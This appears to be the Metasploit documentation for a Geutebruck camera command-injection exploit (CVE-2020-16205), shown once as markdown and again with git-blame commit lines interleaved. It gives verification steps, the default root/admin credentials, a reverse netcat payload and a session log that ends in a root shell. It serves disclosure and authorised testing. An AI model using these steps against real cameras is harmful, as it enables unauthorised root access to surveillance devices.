documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md

## Vulnerable Application

The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25,
firmware version 1.12.13.2 or firmware version 1.12.14.5:
* Encoder and E2 Series Camera models:
  * G-Code:
    * EEC-2xxx
  * G-Cam:
    * EBC-21xx
    * EFD-22xx
    * ETHC-22xx
    * EWPC-22xx

Many brands use the same firmware:
  * UDP Technology (which is also the supplier of the firmware for the other vendors)
  * Ganz
  * Visualint
  * Cap
  * THRIVE Intelligence
  * Sophus
  * VCA
  * TripCorps
  * Sprinx Technologies
  * Smartec
  * Riva

This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.

### Description

This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the
`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`.
This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to
inject a new line character, followed by the command they wish to execute, at which point the server will
then interpret the new string as a separate command to be executed. Successful exploitation will result in
remote code execution as the `root` user.

Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03.

## Verification Steps

  1. Start the camera using default configuration
  2. Launch msfconsole
  3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
  4. Do: `set httpusername <camera_username>`
  5. Do: `set httppassword <camera_password>`
  6. Do: `set lhost <metasploit_ip>`
  5. Do: `set rhosts <camera_ip>`
  6. Do: `set payload cmd/unix/reverse_netcat_gaping`
  7. Do: `check` to be sure the target is vulnerable
  8. Do: `exploit`
  9. You should get a shell

## Options

The default credentials to log on the web interface are root/admin.

 ### HTTPUSERNAME
 A username used to authenticate on the admin page. **Default: root**

 ### HTTPPASSWORD
The password of the username used to authenticate on the admin page. **Default: admin**

## Scenarios
### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
```
msf5 > use exploit/linux/http/geutebruck_testaction_exec
msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
payload => cmd/unix/reverse_netcat_gaping
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
httpusername => root
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin
httppassword => admin
msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1
lhost => 192.168.14.1
msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58
rhosts => 192.168.14.58
msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit

[*] Started reverse TCP handler on 192.168.14.1:4444
[*] 192.168.14.58:80 - Attempting to exploit...
[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200
pwd

/tmp/www_ramdisk/uapi-cgi/admin
id
uid=0(root) gid=0(root)
uname -a
Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux
```
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00			`## Vulnerable Application`

Apply updates to make the English a bit neater r.e affected versions. Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work 2020-08-13 15:13:55 -05:00			`The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25,`
			`firmware version 1.12.13.2 or firmware version 1.12.14.5:`
			`* Encoder and E2 Series Camera models:`
			`* G-Code:`
			`* EEC-2xxx`
			`* G-Cam:`
			`* EBC-21xx`
			`* EFD-22xx`
			`* ETHC-22xx`
			`* EWPC-22xx`
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00
Update geutebruck_testaction_exec.md 2020-08-13 16:02:18 +02:00			`Many brands use the same firmware:`
Apply updates to make the English a bit neater r.e affected versions. Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work 2020-08-13 15:13:55 -05:00			`* UDP Technology (which is also the supplier of the firmware for the other vendors)`
			`* Ganz`
			`* Visualint`
			`* Cap`
			`* THRIVE Intelligence`
			`* Sophus`
			`* VCA`
			`* TripCorps`
			`* Sprinx Technologies`
			`* Smartec`
			`* Riva`

			`This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.`
Update geutebruck_testaction_exec.md 2020-08-13 16:02:18 +02:00
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00			`### Description`

Apply updates to make the English a bit neater r.e affected versions. Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work 2020-08-13 15:13:55 -05:00			`This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the`
			`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`.
			This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to
			`inject a new line character, followed by the command they wish to execute, at which point the server will`
			`then interpret the new string as a separate command to be executed. Successful exploitation will result in`
			remote code execution as the `root` user.

			`Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03.`
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00
			`## Verification Steps`

Update geutebruck_testaction_exec.md 2020-08-13 16:02:18 +02:00			`1. Start the camera using default configuration`
			`2. Launch msfconsole`
			3. Do: `use exploit/linux/http/geutebruck_testaction_exec`
Minor updates to the documentation to reflect the fact that the username and password could be something other than root/admin 2020-08-17 09:12:02 -05:00			4. Do: `set httpusername <camera_username>`
			5. Do: `set httppassword <camera_password>`
Update geutebruck_testaction_exec.md 2020-08-13 16:02:18 +02:00			6. Do: `set lhost <metasploit_ip>`
			5. Do: `set rhosts <camera_ip>`
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00			6. Do: `set payload cmd/unix/reverse_netcat_gaping`
Update geutebruck_testaction_exec.md 2020-08-13 16:02:18 +02:00			7. Do: `check` to be sure the target is vulnerable
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00			8. Do: `exploit`
Update geutebruck_testaction_exec.md 2020-08-13 16:02:18 +02:00			`9. You should get a shell`
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00
			`## Options`

Update geutebruck_testaction_exec.md 2020-08-13 16:02:18 +02:00			`The default credentials to log on the web interface are root/admin.`
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00
Update geutebruck_testaction_exec.md 2020-08-13 16:02:18 +02:00			`### HTTPUSERNAME`
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00			`A username used to authenticate on the admin page. Default: root`

			`### HTTPPASSWORD`
			`The password of the username used to authenticate on the admin page. Default: admin`

			`## Scenarios`
Update geutebruck_testaction_exec.md 2020-08-14 23:15:12 +02:00			`### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.`
Add documentation for Geutebruck G-CAM exploit 2020-08-11 19:43:50 +02:00			```
			`msf5 > use exploit/linux/http/geutebruck_testaction_exec`
			`msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping`
			`payload => cmd/unix/reverse_netcat_gaping`
			`msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root`
			`httpusername => root`
			`msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin`
			`httppassword => admin`
			`msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1`
			`lhost => 192.168.14.1`
			`msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58`
			`rhosts => 192.168.14.58`
			`msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit`

			`[*] Started reverse TCP handler on 192.168.14.1:4444`
			`[*] 192.168.14.58:80 - Attempting to exploit...`
			`[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200`
			`pwd`

			`/tmp/www_ramdisk/uapi-cgi/admin`
			`id`
			`uid=0(root) gid=0(root)`
			`uname -a`
			`Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux`
			```